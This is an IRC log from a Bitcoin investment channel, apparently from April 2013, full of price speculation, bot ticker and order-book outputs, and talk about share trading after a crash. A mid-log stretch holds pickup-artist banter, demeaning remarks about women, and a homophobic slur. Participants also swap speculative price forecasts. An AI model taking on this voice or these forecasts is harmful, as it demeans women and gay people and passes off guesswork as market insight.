averaging out and averaging in are useful concepts Apr 16 14:29:11 Can't pick the top Apr 16 14:29:42 but you can tell you are probably in a bubble and peel off some gains on the way up Apr 16 14:30:20 i think statistically the difference between the strategy of averaging in and the strategy of timing the top Apr 16 14:30:30 EV is the same Apr 16 14:30:32 is the same as the difference between the strategy of martingale and the strategy of playing s.dice Apr 16 14:30:32 ? Apr 16 14:30:41 mp, re: common thought, isn't it a different situation when the very game IS common thought (speculation) Apr 16 14:30:41 possibly Apr 16 14:30:56 actually the proof of this would be a huge step forward in economic theory. Apr 16 14:31:12 I think it boils down to psychology Apr 16 14:31:14 ThickAsThieves i'm always wary when someone proposes something is different from something else. Apr 16 14:31:23 we just don't have that many different things available. Apr 16 14:31:43 mircea_popescu: martingale is for truly iniform random walk Apr 16 14:32:01 speculation is being at the front of the herd, rather than the back, where the wolves are Apr 16 14:32:09 (thinking out loud) Apr 16 14:32:13 replace wolves with terrorists. Apr 16 14:32:20 (ie, imagined threat). nao what ? Apr 16 14:32:24 If you give someone a 50/50 chance of making $1,000,000 or a 100% change of making $500,000, unless they already have many million in the bank, they will invariably pick the sure bet. Apr 16 14:32:38 well its all game again Apr 16 14:32:47 similar thing in settlement negotiations Apr 16 14:32:54 Bugpowder also someone will tend to represent a 49/51 chance as a 33/66 chance and a 1/99 chance as a 0/100 chance. Apr 16 14:33:02 ;;seen smickles Apr 16 14:33:02 smickles was last seen in #bitcoin-assets 1 week, 4 days, 19 hours, 50 minutes, and 28 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 16 14:33:05 this as a restatement of taleb's ideas. Apr 16 14:33:07 sure Apr 16 14:33:21 well, taleb may be restating our ideas Apr 16 14:33:27 cause I didn't read that yet Apr 16 14:33:30 he is, he is. Apr 16 14:33:55 well... the old black swan. 'it never happened therefore it's impossible" fallacy. Apr 16 14:34:09 1/99 really is 0/100 after 72 tries or somesuch Apr 16 14:34:11 in settlement negation, client management and selection is essential for optimizing firm revenue under contingency model Apr 16 14:34:29 You want a client that already is rich Apr 16 14:34:59 Bugpowder: until you're overrun by competition which caters to long trail :) Apr 16 14:35:09 so when a defendant finally raises the settlement offer from 1MM to $10MM, the client doesn't piss himself and take the money Apr 16 14:35:13 come join us at #oracles&rogues where we perform miracle readings and premonitions Apr 16 14:35:19 mircea hi :) Apr 16 14:35:22 ello Apr 16 14:35:32 moar crystal balls, yay Apr 16 14:35:44 yes but this one is lulz Apr 16 14:35:46 Bugpowder this is incidentally why i never raise offers. i make an offer. any further discussion is met with a deduction from the offer. Apr 16 14:35:52 especially the slang Apr 16 14:36:36 works with women, too. ask her out. she fails to accept... well... he'll have to work at it next time. Apr 16 14:36:48 haha i missed an s in there to great benefit. Apr 16 14:36:55 mircea_popescu: i'm afraid this is not universally acceptable *g* Apr 16 14:36:56 you need a client that can say, fuck 100% at 10MM, let's try for the 30% shot at 100MM Apr 16 14:37:00 try that with any self-respecting woman Apr 16 14:37:04 or human, for that matter lol Apr 16 14:37:04 [MPEX] [S.MPOE] 10700 @ 0.00071 = 7.597 BTC [+] Apr 16 14:37:11 is the site issues all good now mircea? Apr 16 14:37:20 well the ddos bs, same guy as gox? Apr 16 14:37:38 ezdiy: works will all women Apr 16 14:37:43 yeah Apr 16 14:37:45 daddy issues ftw Apr 16 14:37:46 :) Apr 16 14:37:47 most men too Apr 16 14:37:59 well, generally works with doormats of all walks of life Apr 16 14:38:08 not just doormats. Apr 16 14:38:13 heh doormats Apr 16 14:38:28 i only trust asicminer Apr 16 14:38:29 There is a lot of truth in 'The Game' Apr 16 14:38:40 pua? Apr 16 14:38:45 yah Apr 16 14:38:48 heh Apr 16 14:38:56 i enjoy that Apr 16 14:39:01 of course, you must be savvy enough to adapt it to your own style Apr 16 14:39:04 niel strauss Apr 16 14:39:08 neil Apr 16 14:39:12 morning Apr 16 14:39:15 and now deal with everyone know about The Game Apr 16 14:39:17 better off reading robert greene books tho Apr 16 14:39:20 Bugpowder: in it's core, it's artificial price inflation Apr 16 14:39:31 Bugpowder: youre making scarce something which is in reality not scarce at all Apr 16 14:39:34 smart women realize that :) Apr 16 14:39:37 read his art of seduction Apr 16 14:39:40 ezdiy it only works with self respecting people. Apr 16 14:39:41 he's the real master Apr 16 14:39:48 which is tricky, because doing the meta-game game usually doesn't not go well. Apr 16 14:40:06 I read all this shit when it was just on that web forum Apr 16 14:40:08 they're the only ones that can go yes or no on the first presentation and stick to it. Apr 16 14:40:10 way before the books Apr 16 14:40:22 [MPEX] [S.MPOE] 1300 @ 0.00070023 = 0.9103 BTC [-] Apr 16 14:40:41 I went from having NO women, to 2 hot girlfriends at the same time Apr 16 14:40:56 women are very easy Apr 16 14:41:00 although a part of my integrity died Apr 16 14:41:10 Bugpowder why not tell them ? Apr 16 14:41:15 heheh Apr 16 14:41:17 what ? Apr 16 14:41:19 early days Apr 16 14:41:22 a Apr 16 14:41:30 I was not ready for that at 20 yr old Apr 16 14:41:43 have you developed your inner game yet? Apr 16 14:41:43 girls don't mind eating a girl out once they figure out it's safe. Apr 16 14:41:55 don't listen to mircea when it comes to girls Apr 16 14:42:04 yeah, i agree. Apr 16 14:42:07 I am retired from the game Apr 16 14:42:07 probably hasn't been with one for a while Apr 16 14:42:17 just be yourself Apr 16 14:42:19 ahaha Apr 16 14:42:20 its simple Apr 16 14:42:25 BitHub: why not? this sort of talk leads to guys one-upping each other Apr 16 14:42:26 gradually Apr 16 14:42:28 its hilarious Apr 16 14:42:35 ezdiy no u. Apr 16 14:42:36 maybe im neggin him ;) Apr 16 14:42:39 lol Apr 16 14:42:51 BitHub this chan has a strict no fag policy. Apr 16 14:42:52 or that alpha male technique thingy Apr 16 14:42:55 mircea_popescu: awww. are we negging? :) Apr 16 14:42:59 /insert relevant xkcd/ Apr 16 14:43:02 heh better ban yourself then Apr 16 14:43:14 i don't smoke. Apr 16 14:43:32 just run off with peoples bits yeah? Apr 16 14:43:43 heh. Apr 16 14:43:55 i kid, i love you Apr 16 14:44:15 beta male move there BitHub Apr 16 14:44:21 supplication Apr 16 14:44:24 that's how easy it is Apr 16 14:44:26 can't he love me ? Apr 16 14:44:27 just showing example Apr 16 14:44:42 but at the end of the day right its a numbers game Apr 16 14:44:53 either you like daddy, or piss off Apr 16 14:44:56 ;;ticker --last Apr 16 14:44:57 58.41000 Apr 16 14:45:02 new girls turning 18 every day Apr 16 14:45:43 depends on what youre looking for Apr 16 14:45:50 listen Apr 16 14:46:00 till 25, people are looking just for a cheap fuck Apr 16 14:46:02 you know why people get gf's and wives etc Apr 16 14:46:10 you do ? Apr 16 14:46:12 because they're poor and scared to die alone Apr 16 14:46:19 yep Apr 16 14:46:24 hmmm Apr 16 14:46:28 can't agree with that Apr 16 14:46:35 its true Apr 16 14:46:38 everybody dies alone. Apr 16 14:46:39 BitHub: whats worse, there are rich people who die alone Apr 16 14:46:40 work on your bank account Apr 16 14:46:41 in the true sense Apr 16 14:46:49 1) positive influence on life, 2) understanding, 3) having kids Apr 16 14:46:50 give it away Apr 16 14:47:05 disregard bitches, acquire satoshi Apr 16 14:47:07 is what i say Apr 16 14:47:10 Scrat: :)))) Apr 16 14:47:11 heh. i guess the rebellious youth of these days no longer reads sartre & co huh. Apr 16 14:47:19 those would be my top 3 reasons for a wife, in some order. Apr 16 14:47:20 anyway my point is, be a man and work on making money Apr 16 14:47:26 teh girls will cum Apr 16 14:47:55 Work on something Apr 16 14:47:58 doesn't need to be money Apr 16 14:48:01 b-b-but im still a poor beta fag Apr 16 14:48:06 t-t-thanks bitcoin-assets Apr 16 14:48:08 srsly. learn how to handle a whip and rope. Apr 16 14:48:11 but you gotta be good at something Apr 16 14:48:16 lul mircea Apr 16 14:48:16 science don't pay Apr 16 14:48:17 BitHub: not much money needed actually Apr 16 14:48:17 why Apr 16 14:48:26 ezdiy at last 1 million Apr 16 14:48:28 least Apr 16 14:48:30 BitHub: it might come as a surprise, but shallow women are mostly interested int *things* Apr 16 14:48:33 because more girls need a good whipping than need money at all. Apr 16 14:48:34 then you can relax Apr 16 14:48:39 ie visible signs of social status Apr 16 14:48:45 ie piss poor, but a good car Apr 16 14:48:46 etc Apr 16 14:49:09 anyway lil off topic, i actually really enjoy all the different bitcoin assets Apr 16 14:49:24 and analysing them Apr 16 14:49:48 any good ipo's coming up? i'm only feeling asicminer at the moment Apr 16 14:52:36 Apr 16 14:52:50 ZIGZAP 2.0 Apr 16 14:52:50 well smickles has goxxed me Apr 16 14:53:36 BitHub: mine Apr 16 14:53:36 coinbullshitter.com Apr 16 14:53:40 it will rox your sox off Apr 16 14:53:56 thestringpuller i thought he was getting out of brokering ? Apr 16 14:54:09 scrat? Apr 16 14:54:16 he probably should if he locks you up for weeks Apr 16 14:54:19 lul bug Apr 16 14:54:37 Scrat, hook me up Apr 16 14:54:42 scam me and i'll you tho Apr 16 14:54:46 BitHub, do you realize that you're repeatedly looking for confirmation that ASICminer shares are a good buy? Apr 16 14:54:59 i already have heaps Apr 16 14:55:01 you know what that means right? Apr 16 14:55:09 self-assuring circle jerks are a good thing Apr 16 14:55:27 notrly. Apr 16 14:55:28 well name another asset then Apr 16 14:55:40 BitHub: well, not yet released Apr 16 14:55:41 24hr volume, 545,000BTC Apr 16 14:55:42 should i put all my btc into ziggap? Apr 16 14:55:49 this is what happens with no lag Apr 16 14:55:58 BitHub: It's a long tail play Apr 16 14:56:05 or maybe should i put all my btc into BAKEDwell Apr 16 14:56:05 you should be looking for reliable stocks that are tied to USD Apr 16 14:56:21 i praise asicminer because its a legit asset Apr 16 14:56:21 ;;ticker --last Apr 16 14:56:23 56.91000 Apr 16 14:56:29 ZIGZAP, BAKEWELL distressed assets and litecoin. Apr 16 14:56:29 since USD is going up Apr 16 14:56:53 i want to get your guys opinions on good and trusthworth bitcoin companies that are floating assets Apr 16 14:56:57 i mean shares Apr 16 14:56:59 asicminer may be the most stable, but you are essentially locking yourself in to BTC/USD value Apr 16 14:57:06 which you may have noticed is plummeting Apr 16 14:57:16 yes Apr 16 14:58:10 so during these times of suicides, isn't it better to be collecting divs? and the demand for stable asset is there, so alot of people pumping, allowing you to golden parachute out later when btc price picks up again? Apr 16 14:58:38 :/ Apr 16 14:58:44 not sure where to start Apr 16 14:59:09 S.DICE could be good Apr 16 14:59:09 you really think divs will outweigh your loss in BTC/USD value? Apr 16 14:59:20 but you really need that betting volume to pickup Apr 16 14:59:24 it hasn't yet Apr 16 14:59:31 Bug, check again Apr 16 14:59:32 @DalaiLama It’s unrealistic to think that the future of humanity can be achieved only on the basis of prayer, what we need is to take action. Apr 16 14:59:40 i guess another religion confronts its intellectual bankruptcy. Apr 16 14:59:53 BTC In doubled 2 days ago, quadrupled last night Apr 16 14:59:54 kik Apr 16 15:00:03 deepceleron whale watch Apr 16 15:00:53 I agreed SDICE is the a defensive USD/BTC play Apr 16 15:01:01 https://bitcointalk.org/index.php?topic=38711.msg1853130#msg1853130 Apr 16 15:01:25 what da fuck is this plot doing? http://blockchain.info/charts/balance?address=12N3m1zR6dkovEZ8fP9LkZkbgtKVX6iGwd Apr 16 15:01:41 lol Apr 16 15:01:42 I think calling that guy a 'whale' is being a little generous. Apr 16 15:02:01 that chart is awesome Apr 16 15:02:04 that is a time travel plot Apr 16 15:02:23 revisionist charting? Apr 16 15:02:32 lol Apr 16 15:02:45 I'd restrict whales to someone with proven 10k btc in a set of addresses and is hammering s.dice for bets of >100BTC for long stretches. Apr 16 15:02:53 impossible chart? Apr 16 15:03:08 skyline of Tokyo 3030? Apr 16 15:03:33 http://i458.photobucket.com/albums/qq302/North_Nitro/HURRDURR.png Apr 16 15:03:56 lol Apr 16 15:04:27 maybe double spend attempts causing that chart? Apr 16 15:08:55 ;;calc 550000*.003*2 Apr 16 15:08:56 3300 Apr 16 15:09:11 ;;calc 3300*60 Apr 16 15:09:12 198000 Apr 16 15:09:30 mtgox only making $200,000 today Apr 16 15:09:39 bummer Apr 16 15:10:34 interesting to note that at bitfinex, they have changed margin rules - they use to offer 5x - I guess that didn't work out so good for them... they still have 400k lent out in margin, but at an average annual rate of ONLY 84% - used to be consistently over 300%... Sentiment indicator? Apr 16 15:10:49 hmm Apr 16 15:10:59 interesting indeed Apr 16 15:11:55 i'll be they go smoked trying to liquidate some margin accounts.... Apr 16 15:12:13 i am boggled anyone'd take that thing seriously. Apr 16 15:12:24 they are using the bitcoinica codebase they've stolen ffs. Apr 16 15:12:34 what more ? what more could one do to be untrustworthy ? Apr 16 15:15:03 Well as long as someone can fix the security issues of the script (unless funds were actually stolen by the admin)... although it casts some serious doubts about the safety of such a thing. Apr 16 15:15:12 meh Apr 16 15:15:28 no. Apr 16 15:15:43 currently bitcoin contains this throng of idiots who literally have no standard. Apr 16 15:15:52 if you go by them there is ABSOLUTELY NOTHING one can do to fuck up. Apr 16 15:16:09 this will ensure bitcoin's failure on the long term if allowed to continue. Apr 16 15:16:22 there must be standards, and if those standards are breached the person must be dead. Apr 16 15:16:43 dead? Apr 16 15:16:46 dead. Apr 16 15:17:01 pk'd Apr 16 15:17:18 there's currently absolutely nothing jared kenna can do to become a bitcoin business person again. Apr 16 15:17:20 nothing at all. Apr 16 15:17:25 repaying all his debts ? nope, doesn't do it. Apr 16 15:17:34 build a temple to satoshi ? mnope, doesn't do it. Apr 16 15:17:42 you scam, you're dead. Apr 16 15:18:30 I didn't say it was good, I said it COULD be possible to reuse some failed codebase if someone fixed it. Not that I think this is likely to have occured. Apr 16 15:18:51 but! they didn;t obtain permission! Apr 16 15:19:06 the bitcoinica victims, one of their avenues to recover something of their lost money Apr 16 15:19:12 would have been codebase licensing. for fixing etc. Apr 16 15:19:50 yeah but that's not happening regardless, does it? Apr 16 15:20:24 doesn't seem likely. i have no idea who'd fix ror code. Apr 16 15:20:28 https://bitcointalk.org/index.php?topic=38711.msg1853238#msg1853238 Apr 16 15:20:29 idiots Apr 16 15:20:32 srsly Apr 16 15:20:38 that is why bitcoin is fucked Apr 16 15:20:39 Maybe I should read more about these cases, but I can't care enough to go and do it. Apr 16 15:20:48 "young enterpreneurs and still learning their business" Apr 16 15:20:49 kakobrekla how much you got locked there ? Apr 16 15:20:49 fuck you. Apr 16 15:20:59 30k Apr 16 15:21:04 not much but eh Apr 16 15:21:27 "young entrepreneurs learning the business" heh. Apr 16 15:21:32 that's exactly what i[m talking about. Apr 16 15:21:39 "he's a young dentist learning dentistry". Apr 16 15:22:01 on your teeth motherfucker. this is okay. because most retards are tauight how to write and nothing else, then given internet access. Apr 16 15:22:11 New Major Lazer out today. noice Apr 16 15:24:40 Honestly, if someone is going to make an exchange or anything without much experience, make it clear BTC withdrawals will take a long time to process. Because there won't be a hotwallet. Apr 16 15:25:23 i am talking fiat money here Apr 16 15:25:40 the tx is 'pending confirmation' for days now Apr 16 15:25:47 fuck you and give me my money Apr 16 15:26:02 eh... that's no good either Apr 16 15:26:31 holding up fiat is just plain bad business... Apr 16 15:26:35 Namworld the problem is Apr 16 15:26:41 noone who is sane Apr 16 15:26:44 would make fiat exchange Apr 16 15:26:47 in the FIRST PLAE Apr 16 15:26:50 PLACE Apr 16 15:26:51 lol Apr 16 15:27:17 BTC, expecially large amounts, i understand. Do you prefer convenience or security? Apr 16 15:27:25 bounce! Apr 16 15:28:13 got a little longer overnight - scale seller over 65 methinks Apr 16 15:30:00 [BTCTC] [ASICMINER-PT] 1 @ 0.83501 BTC [-] Apr 16 15:30:24 [BTCTC] [ASICMINER-PT] 1 @ 0.835 BTC [-] Apr 16 15:31:45 gox 24h volume at 547k... that's HUGE... Apr 16 15:32:51 ;;seen jurov Apr 16 15:32:51 jurov was last seen in #bitcoin-assets 5 hours, 2 minutes, and 57 seconds ago: no wonder everyone uses ;;next Apr 16 15:35:02 [HAVELOCK] [KCIM] 1 @ 1.24999998 BTC [+] Apr 16 15:35:46 future fiat exchange will need blessing of govt and prolly a banking license to be truly succesful Apr 16 15:36:25 [MPEX] [S.MPOE] 1118 @ 0.00071387 = 0.7981 BTC [+] Apr 16 15:36:26 [MPEX] [S.MPOE] 6682 @ 0.00071 = 4.7442 BTC [-] Apr 16 15:36:30 friendly jurisdictions like panama, malta, gibralter, costa rica, even Apr 16 15:40:24 or just use ripple instead ! Apr 16 15:40:37 pgp No lag = more trades Apr 16 15:40:45 bitcoinmilf Apr 16 15:41:15 scrat ? Apr 16 15:41:25 let me know about teh asset Apr 16 15:44:11 547k... impressive Apr 16 15:44:58 are we going to bounce around this week and still return to 30$? Apr 16 15:45:18 or is 50 the bottom? Apr 16 15:46:21 ;;ticker Apr 16 15:46:23 BTCUSD ticker | Best bid: 59.00100, Best ask: 59.92000, Bid-ask spread: 0.91900, Last trade: 59.89000, 24 hour volume: 547666.44717794, 24 hour low: 50.01000, 24 hour high: 98.22700, 24 hour vwap: 68.89155 Apr 16 15:47:49 ;;next Apr 16 15:47:50 57-58 support | resistance: 70, 77, 85-88 | upper target in case of breakout mid-90s - 100 | highest targets 111-113 | updated by OneFixt at Apr 16 2013, 10:40 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 2 hours, 7 minutes, and 48 seconds ago Apr 16 15:48:31 I'd be surprised 50 is the bottom Apr 16 15:49:48 Also I don't understand how this support/resistance is calculated... Apr 16 15:50:28 This data looks dubious Apr 16 15:52:34 ;;bids 30 Apr 16 15:52:34 There are currently 130246.66 bitcoins demanded at or over 30.0 USD, worth 5550385.33549 USD in total. | Data vintage: 8.8607 seconds Apr 16 15:52:45 ;;bids 90 Apr 16 15:52:45 There are currently 0 bitcoins demanded at or over 90.0 USD, worth 0.0 USD in total. | Data vintage: 19.9924 seconds Apr 16 15:52:57 ;;asks 90 Apr 16 15:52:58 There are currently 51116.173 bitcoins offered at or under 90.0 USD, worth 3911649.1496 USD in total. | Data vintage: 32.4811 seconds Apr 16 15:53:49 ;;ticker Apr 16 15:53:49 BTCUSD ticker | Best bid: 59.29001, Best ask: 59.66249, Bid-ask spread: 0.37248, Last trade: 59.66249, 24 hour volume: 547741.83685989, 24 hour low: 50.01000, 24 hour high: 98.22700, 24 hour vwap: 68.88007 Apr 16 15:53:55 50 isnt bottom Apr 16 15:55:01 [HAVELOCK] [VTX] 3 @ 0.47000001 = 1.41 BTC [-] Apr 16 15:55:03 [HAVELOCK] [VTX] 2 @ 0.47 = 0.94 BTC [-] Apr 16 15:55:17 ;;next Apr 16 15:55:17 57-58 support | resistance: 70, 77, 85-88 | upper target in case of breakout mid-90s - 100 | highest targets 111-113 | updated by OneFixt at Apr 16 2013, 10:40 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 2 hours, 15 minutes, and 16 seconds ago Apr 16 15:55:42 14 hours ago: There are currently 35974.547 bitcoins offered at or under 100.0 USD Apr 16 15:55:49 ;;asks 100 Apr 16 15:55:49 There are currently 68671.866 bitcoins offered at or under 100.0 USD, worth 5613040.35424 USD in total. | Data vintage: 63.7432 seconds Apr 16 15:56:04 deadweasel: I suspect we could bounce as high as 90 in the next few days, but also expect to see 30 or below sometime in the next 3 Apr 16 15:56:06 [BTCTC] [CRYPTO-TRADE] 1 @ 0.09001 BTC [-] Apr 16 15:56:07 We've accumulated a nice 68k BTC asks under 100 USD/BTC. It keeps raising, bids keeps lowering. Looks like mostly people cashing out right now. Apr 16 15:56:08 3 months Apr 16 15:56:14 ;;bids 49.9 Apr 16 15:56:15 There are currently 33142.458 bitcoins demanded at or over 49.9 USD, worth 1740332.85768 USD in total. | Data vintage: 89.1672 seconds Apr 16 15:56:41 ;;market --sell 20000 Apr 16 15:56:41 A market order to sell 20000 bitcoins right now would net 1080445.3355 USD and would take the last price down to 51.0000 USD, resulting in an average price of 54.0223 USD/BTC. | Data vintage: 115.8273 seconds Apr 16 15:56:48 ;;market --sell 30000 Apr 16 15:56:51 A market order to sell 30000 bitcoins right now would net 1585346.9489 USD and would take the last price down to 50.0000 USD, resulting in an average price of 52.8449 USD/BTC. | Data vintage: 0.0009 seconds Apr 16 15:57:02 [HAVELOCK] [VTX] 2 @ 0.45 = 0.9 BTC [-] Apr 16 15:57:03 [HAVELOCK] [VTX] 2 @ 0.445 = 0.89 BTC [-] Apr 16 15:57:04 [HAVELOCK] [VTX] 2 @ 0.441 = 0.882 BTC [-] Apr 16 15:57:06 [HAVELOCK] [VTX] 4 @ 0.44 = 1.76 BTC [-] Apr 16 15:57:13 similar level of bids were there when I went to bed Apr 16 15:57:14 Bugpowder: that follows previous bubble behavior, no? Apr 16 15:57:16 so 50 would only be bottom if no one dodges falling price Apr 16 15:57:48 got cleaned out then bounced to 66 in the space of 3 hours Apr 16 15:57:49 yeah Apr 16 15:58:13 deadweasel_work: yes. That's really the only thing I'm going on here. Apr 16 15:58:16 when you try to compare with 2011 bubble, dont forget MTgox hack ! less than a week after crash Apr 16 15:58:25 true Apr 16 15:58:36 well… get ready for a hack then! Apr 16 15:58:37 :) Apr 16 15:58:40 well we've had lots of bounce. People each time hoped for a quick rise back so they could sell their BTC they bought at a premium. Apr 16 15:58:41 lol Apr 16 15:58:52 http://bitcoincharts.com/charts/mtgoxUSD#rg10zigHourlyztgSza1gEMAzm1g10za2gEMAzm2g50zv Apr 16 15:58:59 Still looks strongly bearish Apr 16 15:59:25 [BTCTC] [S.BBET-PT] 1 @ 0.00195 BTC [-] Apr 16 15:59:59 yep ADX also falls whenever buying increases Apr 16 16:00:08 i agree, though I think we could break out here to upper 60's Apr 16 16:00:32 then come back down Apr 16 16:00:33 Trend is yo friend Apr 16 16:00:46 when it was going up, buy the dips, buy calls Apr 16 16:01:26 when its going down, wait it out, or take short term long positions on sharp selloffs, selling the bounce, if you must trade Apr 16 16:01:53 yeah Apr 16 16:02:56 we'll plateau or slight slope until buying/volume subsides, then dumping will resume Apr 16 16:03:40 The beatings will continue until morale improves Apr 16 16:03:53 ;;eightball will we stabilize Apr 16 16:03:54 What are you asking me for? Apr 16 16:04:15 ;;eightball Will we see 40 in less than 24 hours? Apr 16 16:04:16 NO. Apr 16 16:04:23 :( Apr 16 16:04:59 ;;eightball Will we see 40 USD/BTC in less than 24 hours? Apr 16 16:04:59 It is so. Apr 16 16:05:09 oh it thought i meant something else Apr 16 16:05:10 if I were filthy rich I'd make a bot that trades based on gribble's eightball, just for kicks Apr 16 16:05:13 maybe age Apr 16 16:05:14 He must have confused 40 for something else Apr 16 16:05:15 :) Apr 16 16:05:30 my birthday is soon, not 40 just yet Apr 16 16:06:04 ;;ticker Apr 16 16:06:05 BTCUSD ticker | Best bid: 59.89701, Best ask: 59.91000, Bid-ask spread: 0.01299, Last trade: 59.91000, 24 hour volume: 549138.33281102, 24 hour low: 50.01000, 24 hour high: 98.22700, 24 hour vwap: 68.83756 Apr 16 16:06:24 ;;bc,24hprc Apr 16 16:06:26 69.26 Apr 16 16:06:45 ;;gribble If you gave 3 wishes, could I wish for more wishes? Apr 16 16:06:45 yes I am gribble. why do you keep bothering me? Apr 16 16:06:55 fine Apr 16 16:07:11 ;;eightball If you gave 3 wishes, could I wish for more wishes? Apr 16 16:07:11 It is so. Apr 16 16:09:18 ;;eightball will satoshi come back ? Apr 16 16:09:18 Naturally. Apr 16 16:09:51 ;;eightball will satoshi say it was a big joke ? Apr 16 16:09:51 The outlook is good. Apr 16 16:10:01 [HAVELOCK] [KCIM] 1 @ 1.05000003 BTC [-] Apr 16 16:11:31 [MPEX] [S.MPOE] 8550 @ 0.00070758 = 6.0498 BTC [-] Apr 16 16:11:33 [MPEX] [S.MPOE] 6900 @ 0.0007028 = 4.8493 BTC [-] Apr 16 16:11:34 [MPEX] [S.MPOE] 1400 @ 0.0006965 = 0.9751 BTC [-] Apr 16 16:11:36 [MPEX] [S.MPOE] 2650 @ 0.00069512 = 1.8421 BTC [-] Apr 16 16:11:37 [BTCTC] [CRYPTO-TRADE] 5 @ 0.09 = 0.45 BTC [-] Apr 16 16:12:43 [BTCTC] [CRYPTO-TRADE] 1 @ 0.07201 BTC [-] Apr 16 16:13:06 [BTCTC] [MININGCO.ETF] 1 @ 0.62 BTC [-] Apr 16 16:13:09 [BTCTC] [CRYPTO-TRADE] 35 @ 0.06 = 2.1 BTC [-] Apr 16 16:16:45 anyone heard anything from the people behind crypto trade? Apr 16 16:18:04 just that they like moving their open date Apr 16 16:18:33 coinlab? Apr 16 16:18:39 :) Apr 16 16:21:53 [MPEX] [S.MPOE] 5139 @ 0.00071387 = 3.6686 BTC [+] Apr 16 16:23:20 [BTCTC] [GSDPT] 5 @ 0.00421 = 0.0211 BTC [+] Apr 16 16:26:29 upside breakout? Apr 16 16:27:11 falling asleep over here TBH Apr 16 16:27:32 lets see it hit 62 Apr 16 16:28:39 ;;ticker Apr 16 16:28:40 BTCUSD ticker | Best bid: 61.00102, Best ask: 61.69899, Bid-ask spread: 0.69797, Last trade: 61.00102, 24 hour volume: 552465.69282423, 24 hour low: 50.01000, 24 hour high: 98.22700, 24 hour vwap: 68.74805 Apr 16 16:32:03 [BTCTC] [GSDPT] 20 @ 0.00377 = 0.0754 BTC [-] Apr 16 16:38:33 ;;ticker Apr 16 16:38:35 BTCUSD ticker | Best bid: 61.49999, Best ask: 61.50000, Bid-ask spread: 0.00001, Last trade: 61.49999, 24 hour volume: 553160.98601480, 24 hour low: 50.01000, 24 hour high: 98.22700, 24 hour vwap: 68.72244 Apr 16 16:38:38 [BTCTC] [S.DICE-PT] 60 @ 0.0036 = 0.216 BTC [-] Apr 16 16:41:08 http://www.google.com/search?q=scott+locklin&tbs=qdr:d lol Apr 16 16:41:11 i wonder if he learns by it. Apr 16 16:41:14 all this 0.01 shit on the gox book is ridiculous... Apr 16 16:44:58 [MPEX] [S.MPOE] 5087 @ 0.00071387 = 3.6315 BTC [+] Apr 16 16:45:00 [MPEX] [S.MPOE] 4312 @ 0.00071404 = 3.0789 BTC [+] Apr 16 16:45:02 it speaks volumes Apr 16 16:45:05 badoom Apr 16 16:46:01 [BTCTC] [ASICMINER-PT] 5 @ 0.88 = 4.4 BTC [+] Apr 16 16:46:20 https://bitcointalk.org/index.php?topic=130982.msg1850804#msg1850804 avalon is unplugging units and shipping Apr 16 16:46:52 [BTCTC] [ASICMINER-PT] 1 @ 0.89999 BTC [+] Apr 16 16:47:01 [BTCTC] [ASICMINER-PT] 1 @ 0.89999 BTC [+] Apr 16 16:47:28 [BTCTC] [ASICMINER-PT] 3 @ 0.89999 = 2.7 BTC [+] Apr 16 16:49:34 [BTCTC] [ASICMINER-PT] 1 @ 0.851 BTC [-] Apr 16 16:49:49 ThickAsThieves interesting. Apr 16 16:52:15 ;;nethash Apr 16 16:52:15 65688.1558736 Apr 16 16:54:39 [BTCTC] [BTC-BOND] 1000 @ 0.01 = 10 BTC [+] Apr 16 16:59:33 [BTCTC] [BTC-BOND] 1060 @ 0.01 = 10.6 BTC [+] Apr 16 17:00:32 [BTCTC] [ASICMINER-PT] 1 @ 0.86 BTC [+] Apr 16 17:02:07 [BTCTC] [ASICMINER-PT] 1 @ 0.855 BTC [-] Apr 16 17:02:10 [BTCTC] [ASICMINER-PT] 1 @ 0.85 BTC [-] Apr 16 17:03:35 Rally looks great on the M1 Apr 16 17:03:40 then I switch to M15 Apr 16 17:05:28 68 i sprolly top Apr 16 17:06:41 if it clearly 60's, there's a pretty good shot at upper 70's , i think Apr 16 17:07:11 [BTCTC] [ASICMINER-PT] 1 @ 0.83 BTC [-] Apr 16 17:07:23 [BTCTC] [ASICMINER-PT] 1 @ 0.8222 BTC [-] Apr 16 17:07:27 [BTCTC] [ASICMINER-PT] 5 @ 0.81003 = 4.0502 BTC [-] Apr 16 17:07:31 [BTCTC] [ASICMINER-PT] 5 @ 0.81002 = 4.0501 BTC [-] Apr 16 17:07:53 lol, who trades on M1? Apr 16 17:07:59 I know I don't... Apr 16 17:08:10 me Apr 16 17:08:16 last night Apr 16 17:08:23 and me Apr 16 17:08:51 scalpers Apr 16 17:08:55 there are cycles within cycles... Apr 16 17:09:11 c'mon Apr 16 17:10:02 [HAVELOCK] [KCIM] 1 @ 1.15 BTC [+] Apr 16 17:11:02 [HAVELOCK] [KCIM] 1 @ 1.15 BTC [+] Apr 16 17:12:04 wow Apr 16 17:12:09 [BTCTC] [ASICMINER-PT] 10 @ 0.81 = 8.1 BTC [-] Apr 16 17:12:12 [BTCTC] [ASICMINER-PT] 15 @ 0.8 = 12 BTC [-] Apr 16 17:12:15 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [-] Apr 16 17:15:57 [BTCTC] [ASICMINER-PT] 1 @ 0.792 BTC [-] Apr 16 17:16:00 [BTCTC] [ASICMINER-PT] 12 @ 0.79101 = 9.4921 BTC [-] Apr 16 17:18:08 [BTCTC] [ASICMINER-PT] 3 @ 0.79101 = 2.373 BTC [-] Apr 16 17:18:15 [BTCTC] [ASICMINER-PT] 30 @ 0.791 = 23.73 BTC [-] Apr 16 17:18:26 these PUTs are pricey Apr 16 17:18:42 [BTCTC] [ASICMINER-PT] 7 @ 0.790001 = 5.53 BTC [-] Apr 16 17:18:50 anyone selling better priced PUTs? Apr 16 17:19:26 they are impossibly priced - all put > 1 by bot Apr 16 17:19:42 yeah Apr 16 17:19:57 although at half the strike value, they're worth 1 BTC already... Apr 16 17:20:02 but still Apr 16 17:21:03 best puts are in the money at 32 USD/BTC Apr 16 17:23:13 pgp 1 is a max for calls, it has no particular relaiton to puts. Apr 16 17:29:57 ;;ticker Apr 16 17:29:59 BTCUSD ticker | Best bid: 60.97661, Best ask: 61.50000, Bid-ask spread: 0.52339, Last trade: 61.84948, 24 hour volume: 562839.81439493, 24 hour low: 50.01000, 24 hour high: 97.69000, 24 hour vwap: 68.46823 